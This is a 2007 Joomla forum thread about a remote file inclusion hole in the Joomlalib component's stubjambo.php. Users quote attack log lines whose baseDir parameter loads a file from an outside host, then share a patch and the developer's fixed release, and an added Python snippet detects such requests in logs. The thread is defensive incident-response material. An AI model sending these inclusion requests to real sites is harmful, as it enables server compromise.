Remote File Inclusion: Joomlalib - All versions
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Remote File Inclusion: Joomlalib - All versions
Hi,
My provider has sent me an email with the message that there was a hack attempt on the server through my site.
According to the log 'the hacker' included an external URL in stubjambo.php.
What can I do about this?
I use Joomla 1.0.13
latest PHP and MySQL
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
Hack attempt does not mean the crack has been done.
Please ask your provider to quote the log concerning this.
Also, which version of Joomlalib and/or bsq_sitestats are you using?
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Re: hacking attempt com_joomlalib
log:
scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"
I have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
They do not come with Joomla. These are 3rd party extensions.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 16
- Joined: Mon Jun 05, 2006 2:04 pm
Re: hacking attempt com_joomlalib
Ah, but I still have no idea. Any idea where I can find this?
- RussW
- Joomla! Exemplar
- Posts: 9347
- Joined: Sun Oct 22, 2006 4:42 am
- Location: Sunshine Coast, Queensland, Australia
- Contact:
Re: hacking attempt com_joomlalib
Please log in to your Joomla! Administrator site, list the components and there you will see the versions of the installed items and their appropriate authors' websites. Check on the authors' websites for updates and/or known exploits, also check their forums for similar problems, these are not core Joomla! extensions.
Joomla! on the fabulous Sunshine Coast...
hotmango, web & print http://www.hotmango.me/
The Styleguyz https://www.thestyleguyz.com/
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Oct 06, 2006 12:10 am
Remote File Inclusion: Joomlalib - All versions
Affected component:
Joomlalib (necessary for the Gallery2 component)
The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
What do you guys suggest as fix?
File contains:
Code: Select all
<?
/** Create a Joomla/Mambo environment for our example programs
* @package examples
*/
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
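An added example, not part of the thread or of JoomlaLib: a Python check for the request pattern in the log lines quoted above, where a query parameter such as baseDir carries a remote URL. The sample lines are constructed (documentation-range addresses, .invalid hosts), and the function name, field names and the 2xx/other triage split are assumptions made here.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache "combined" format, optionally preceded by a virtual-host column
# (the first log line quoted in the thread has one).
LINE_RE = re.compile(
    r'^(?:(?P<vhost>\S+) )?(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a remote URL is the RFI signature.
REMOTE_URL = re.compile(r'^(?:https?|ftps?)://', re.I)

SAMPLE_LOG = [  # constructed lines, modelled on the format quoted in the thread
    'site.example 203.0.113.7 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://files.example.invalid/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"',
    '198.51.100.9 - - [19/Feb/2009:10:00:01 +0100] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http%3A%2F%2Ffiles.example.invalid%2Fecho3%3F HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [19/Feb/2009:10:00:05 +0100] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
]

def find_rfi_attempts(lines):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        path, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes once; unquote again to catch double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(unquote(value).strip()):
                status = int(m.group("status"))
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "path": path,
                    "param": name,
                    "status": status,
                    # Heuristic: 2xx means the targeted script exists and
                    # answered, so the host needs checking; anything else
                    # (e.g. 404) was a probe for a file that is not there.
                    "triage": "investigate" if 200 <= status < 300 else "probe-only",
                })
                break  # one finding per request is enough
    return findings

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f["triage"], f["status"], f["client"], f["path"], f["param"])
```

Parameters that legitimately carry URLs (redirect targets, for instance) also match this pattern, so expect to allowlist them per site.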
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: hacking attempt com_joomlalib
Merging with similar thread.
Looks like joomlalib is indeed at stake.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- 55thinking
- Joomla! Enthusiast
- Posts: 183
- Joined: Mon Sep 05, 2005 8:58 am
- Location: Madrid
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Is there a fix available?
We are affected...and we are not using the mentioned component, it got injected in our install
55 Thinking - Strategy Design Technology
Good looking, Fast and Usable web solutions
http://www.55thinking.com/
-
- Joomla! Fledgling
- Posts: 1
- Joined: Thu Sep 20, 2007 10:36 am
Re: Remote File Inclusion: Joomlalib - All versions
Hi,
This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...
Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file does not seem to help.
If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.
Cheers,
Code: Select all
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Code: Select all
<?
/** Create a Joomla/Mambo environment for our example programs
* @package examples
*/
if(isset($_REQUEST['baseDir'])) { return FALSE;}
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Oct 06, 2006 12:10 am
Re: Remote File Inclusion: Joomlalib - All versions
Fix works here without complications. Thanks for your quick response.
amacide wrote: Hi,
This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...
Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file does not seem to help.
If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.
Cheers,
Code: Select all
if(isset($_REQUEST['baseDir'])) { return FALSE;}
Code: Select all
<?
/** Create a Joomla/Mambo environment for our example programs
* @package examples
*/
if(isset($_REQUEST['baseDir'])) { return FALSE;}
$baseDir = dirname(__FILE__) . '/';
/** */
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );
$GLOBALS['database'] = $database;
?>
-
- Joomla! Apprentice
- Posts: 27
- Joined: Sun Oct 30, 2005 1:39 am
- Location: Denmark
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
This is certainly at risk! If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts.
I've sent a copy of the injected code to infograf768 - I hope he will comment on the code here, if he gets the time...
/hamsel
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Sending mails around...
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Hi,
Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can.
Brent
Developer, bsq_sitestats module.
www.bs-squared.com
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice.
Developer, bsq_sitestats module.
www.bs-squared.com
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
Developer, bsq_sitestats module.
www.bs-squared.com
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Brent,
Thanks for your fast reply.
JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports
BSQ sitestats is concerned but also the Gallery2 extension I guess.
Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too.
JM
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- ot2sen
- Joomla! Master
- Posts: 10381
- Joined: Thu Aug 18, 2005 9:58 am
- Location: Hillerød - Denmark
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
BSQ and Gallery2Bridge published again. Feel welcomed to update descriptions and version info. Thanks
trompete wrote: I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
Ole Bang Ottosen
Dansk frivillig Joomla! support websted - joomla.dk
OpenTranslators Core Team opentranslators.org
-
- Joomla! Apprentice
- Posts: 5
- Joined: Sun Dec 04, 2005 2:48 am
Site hacked through joomlalib
I have posted the problem in the dev forum of joomlalib, so I will just post here the link to their forum.
http://forum.4theweb.nl/showthread.php?p=5020#post5020
From my point of view, the newest joomlalib is also affected!
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Site hacked through joomlalib
Moving to the related thread.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
@trompete
Can you look into that?
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- trompete
- Joomla! Explorer
- Posts: 273
- Joined: Thu Sep 01, 2005 11:19 pm
- Location: Minneapolis, USA
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6)
Developer, bsq_sitestats module.
www.bs-squared.com
- Michiel_1981
- Joomla! Intern
- Posts: 71
- Joined: Sun Aug 28, 2005 6:38 am
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
infograf768 wrote: @trompete
Can you look into that?
Just looked into this with trompete, and there is NO known include like this in the code anymore, we emptied the file completely in the latest release.
So post complete file content and file name! So we can look into this.
kind regards,
Michiel
EDIT: forgot 1 word
Last edited by Michiel_1981 on Tue Oct 09, 2007 2:28 pm, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Remote File Inclusion: Joomlalib - All versions
Thanks folks.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 5
- Joined: Sun Dec 04, 2005 2:48 am
Re: Remote File Inclusion: Joomlalib - All versions
thanks. didn't see this topic. and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem.
-
- Joomla! Apprentice
- Posts: 24
- Joined: Thu Feb 19, 2009 2:23 pm
Re: Remote File Inclusion: Joomlalib - All versions
Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day:
[RussW: IP addresses removed, pointless exercise, these could be other compromised sites, via proxies or hijacked, the IP addresses potentially mean nothing and do not assist with issue diagnosis or resolution]
Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!!
I am running 1.0.15, and this directory/file does not reside on my website.
-
- Joomla! Apprentice
- Posts: 16
- Joined: Sat Apr 24, 2010 5:21 am
- Contact:
Re: Remote File Inclusion: Joomlalib - All versions
Thank you very much for information.
trompete wrote: I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/
I still can't find the extension site entries to update them, but here's the fixed version.
C R Wills
Law Directory - http://www.attorneylawyerdirectory.org
Constuction Directory - http://constructiontoday.org